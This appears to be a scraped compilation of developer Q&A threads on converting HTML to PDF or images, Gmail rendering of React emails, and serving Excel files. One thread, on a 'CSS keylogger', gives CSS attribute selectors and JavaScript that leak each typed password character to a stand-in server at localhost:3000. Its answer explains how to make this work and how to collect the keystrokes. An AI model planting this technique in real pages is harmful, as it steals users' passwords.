Emoji convered to greyed out in PDF output from Chrome Headless - puppeteer

(Note, even though this mention Pyppeteer, the Python version of Puppeteer, the code is exactly the same and works with either Puppeteer and Pyppeeteer).
Hi,
I'm converting the page http://getemoji.com/ into PDF using the following code :
import asyncio
from pyppeteer import launch
from pyppeteer.launcher import connect
async def main():
browser = await launch()
context = await browser.createIncognitoBrowserContext()
page = await context.newPage()
page.on('dialog', lambda dialog: dialog.dismiss())
# await page.emulateMedia('print')
await page.goto('http://getemoji.com/')
await page.screenshot({'path': 'example.png'})
await context.close()
await browser.disconnect()
asyncio.get_event_loop().run_until_complete(main())
And it generates properly the following image:
But if I try to convert the page into PDF, like this:
await page.pdf({
'path': 'example.pdf',
'format': 'A4'
})
All the emoticons are greyed in the resulting PDF, like this:
The issue is not a font issue with the emoji, since they work perfectly on the screenshot. It's something related to how the PDF is generated, but I can't find out why.
I'm hoping you'll find it :)

I came across the same issue and did some searching. The issue seems to be twofold.
As you guessed, it is to do with the CSS rules for media printing. The site uses a bootstrap css file which has following rules:
#media print {
* {
color: #000!important;
text-shadow: none!important;
background: 0 0!important;
box-shadow: none!important
}
...
}
which gives a blanket rule for foreground color of all content to be black when printing it.
Fortunately, Pyppeteer provides an API to define the media type to be used for printing the content: page.emulateMedia which if provided the 'screen' argument would ignore the media print rules. If you use this, you would see that some of the content now has colors, the links look better too.
The second issue seems to be the way Chrome prints a pdf. Pyppeteer actually uses the 'Print to PDF' functionality as provided by Chrome. So, the issue is not really with Pyppeteer.
To confirm this, I created a simple webpage which had some emojis and did not have any media printing css. When I manually open the page in Chrome and save it as a PDF, the emojis appear in black.

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
inp.setAttribute('value', inp.value)
});
Is what I've found but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work as typing in the input field will not change the value attribute of the html element. A JavaScript function is required to do this. Hence, include the last 3 lines of your snippet in a script tag and then it should work.
The CSS Keylogger was originally a thought experiment as explained in this LiveOverflow video. The snippet you are using is assuming that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

HTML e-mail generated by React breaks in GMail web client

I needed to generate a newsletter e-mail server-side. I researched various options, but I picked React (server-side rendering) because of good TypeScript support and my familiarity with that technology.
Generating an e-mail that displays correctly in GMail (or any other popular client) is a very tricky subject, as one needs to use small (and legacy) HTML subset. But that's a separate issue.
So I've crafted a test e-mail with React SSR, using the subset of HTML supported by GMail. To be sure, I've validated it with W3 Validator and it was successfully checked.
But when I sent the generated HTML output to a GMail address and displayed it in the GMail desktop web application, the output was a mess. In the mail HTML presented in the browser, some elements had missing inline CSS properties, while other were outside of their original parents.
How can I generate an e-mail using React that doesn't break in the GMail web application?
React renderToString function (and the similar ones, too, probably) emits a single-line minified HTML output without any line length limit.
For reasons beyond my reasoning, such single-line HTML documents can "break" GMail HTML parser and cause glitchy output.
But, on the other hands, resources online actually recommend e-mail HTML minification, as whitespace can (reportedly) be interpreted inconsistently across e-mail clients. So pretty-printing HTML output doesn't sound like a good idea.
A solution is to re-minify the HTML document, but with a line length limit. To be safe, I've put the limit quite low. I've used a popular html-minifier package.
import * as React from "react";
import { minify } from "html-minifier";
import { renderToString } from "react-dom/server";
export const renderMyMail = (params: MyMailParams): string => {
const reactHtmlString = renderToString(MyMail({ params }));
const reminifiedHtmlString = minify(reactHtmlString, { maxLineLength: 255, keepClosingSlash: true });
return reminifiedHtmlString;
};
Now, the e-mail displays correctly in GMail web application.

Rendering a pdf file from an html view to display it on a web page as a image preview

I need to create a pdf preview that should be displayed on a web page as an image. The pdf file is just a simple report build on almost plain HTML. Essentially I had a problem with displaying checkboxes, now I replaced them with pics of checkboxes but the issue remains the same.
Here how I create the pdf report from my HTML view with help of groovy and grails:
def html = htmlRenderService.getReport(info)
ByteArrayOutputStream out = new ByteArrayOutputStream()
HtmlImageGenerator htmlImageGenerator = new HtmlImageGenerator()
htmlImageGenerator.loadHtml(html)
BufferedImage bi = htmlImageGenerator.bufferedImage
ImageIO.write(bi, "PNG", out)
byte[] bytes = out.toByteArray()
String base64bytes = encoder.encodeToString(bytes)
String src = "data:image/png;base64," + base64bytes
out.flush()
def getReport(Info info) {
return groovyPageRenderer.render(view: REPORT_VIEW,
model: [info: info])
}
Then I send the src string to my view and render it as:<img src="${src}" alt=""/>
Then my checkbox pic looks like this: <div style="/*style stuff*/ background-image: url(data:image/png;base64,LINK_TO_THE_IMAGE"></div>
In the end, I received a picture of my pdf report rendered pretty well displaying as an image on my page, BUT without checkboxes. Here is the picture of one part of it:
And here is the same part but from the pdf document which I rendered all the same way, but just downloaded directed from my webapp:
Here is an example where I combined both options(input checkbox and image checkbox) and rendered it as an image:
So what could cause this issue? Thank you in advance.
UPDATE: I came across today to this comment under another issue with HtmlImageGenerator:
HtmlImageGenerator seems to use a JEditorPane for rendering the HTML. Swing HTML support does not extend to the ability to render data images. It might be possible by digging into the HTMLEditorKit and changing the image loading element to support data images, but then you'd need to find a way to get HtmlImageGenerator to use the altered editor pane.
Seems that HtmlImageGenerator doesn't work well with images inside HTML files, but it's still unclear why it doesn't render checkbox inputs as well.
Without seeing the code you end up with after page load, check the chrome dev tools panel to see if the image has actually loaded correctly to the page which will tell you it's at least accessible to use. Then check if the url is output correctly to the div as the background-image. If it looks correct and there aren't related errors in the console, it is likely a css setting.
With background images, your container will need to contain content or else you will need to specify:
width
height
a display setting
background-position, and a
background-size
If you can upload more info, I might be able to be more specific.

How to convert HTML to image in Node.js

I need to convert an HTML template into an image, on a Node server.
The server will receive the HTML as a string. I tried PhantomJS (using a library called Webshot), but it doesn't work well with flex box and modern CSS. I tried to use Chrome headless-browser but it doesn't seem to have an API for parsing html, only URL.
What is the currently best way to convert a piece of HTML into image?
Is there a way to use headless Chrome in a template mode instead of URL mode? I mean, instead of doing something like
chrome.goTo('http://test.com')
I need something like:
chrome.evaluate('<div>hello world</div>');
Another option, suggested here in the comments to this post, is to
save the template in a file on the server and then serve it locally and do something like:
chrome.goTo('http://localhost/saved_template');
But this option sounds a bit awkward. Is there any other, more straightforward solution?
You can use a library called Puppeteer.
Sample code snippet :
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.setViewport({
width: 960,
height: 760,
deviceScaleFactor: 1,
});
await page.setContent(imgHTML);
await page.screenshot({path: example.png});
await browser.close();
This will save a screenshot of the HTML in the root directory.
You can easily do it on frontend using html2canvas. On backend you can write the html on a file and access using a file URI (i.e: file:///home/user/path/to/your/file.html), it should work fine with chrome headless-browser and Nightmare (screenshot feature). Another option is to setup a simple HTTP server and access the url.

Excel file downloads instead of displaying in iframe

I have this in my controller class:
public ActionResult ExcelDoc()
{
var doc = Server.MapPath("~/Content/Sheet1.xlsx");
return File(doc, "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet");
}
And in my view:
<iframe src="/Centres/ExcelDoc"></iframe>
It simply DOES NOT display the file in the iframe. Instead, it begins downloading sheet1.xlsx as ExcelDoc.xlsx. Very frustrating as previous questions have helped me to develop this solution to my previous problem of trying to display a dynamically generated excel file in an iframe. I am using Google Chrome, if that is relevant.
Returning a file makes your browser try to download it, that's expected behaviour. I think it's not possible to display an excel file as-is in your browser window, unless you use something like a plug-in.